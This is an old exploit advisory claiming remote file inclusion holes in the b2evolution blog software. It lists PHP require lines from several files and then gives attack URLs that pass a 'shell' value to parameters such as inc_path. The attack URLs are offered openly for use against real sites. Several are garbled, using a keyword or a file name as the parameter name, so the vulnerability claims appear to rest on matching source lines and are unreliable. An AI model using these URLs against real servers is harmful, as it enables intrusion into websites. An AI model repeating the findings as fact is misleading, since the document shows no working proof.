#################################################### # b2evolution Remote File Inclusion # #################################################### Affected Software .: b2evolution # Download..: http://b2evolution.net/ # Risk ..............: high # Date .........: 25/4/2007 # Found by ..........: s433d_only_linux # Contact ...........: s433d_only_linux@xxxxxxxx # Web .............: Www.hackerz.ir # special thanx ........... Ali Jasbi my beste friend# #################################################### #################################################### Affected File: b2evolution\blogs/a_noskin.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/a_stub.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/admin.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/admin.php require $view_path.'errors/_access_denied.inc.php'; b2evolution\blogs/admin.php require_once $inc_path.'_async.inc.php'; b2evolution\blogs/admin.php require $control_path.$ctrl_mappings[$ctrl]; b2evolution\blogs/contact.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/contact.php require $skins_path.'_msgform.php'; b2evolution\blogs/default.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/index.php require_once $inc_path.'_main.inc.php'; b2evolution\blogs/index.php require $inc_path.'_blog_main.inc.php'; b2evolution\blogs/multiblogs.php require_once $inc_path.'_blog_main.inc.php'; b2evolution\blogs/multiblogs.php require $skins_path.'_bloglist.php'; b2evolution\blogs/multiblogs.php require $skins_path.'_feedback.php'; ###################################################### b2evolution\blogs/a_noskin.php?require=shell? b2evolution\blogs/a_stub.php?_blog_main.inc.php=shell? b2evolution\blogs/admin.php?inc_path= b2evolution\blogs/admin.php?errors/_access_denied.inc.php=shell? b2evolution\blogs/admin.php?inc_path=shell
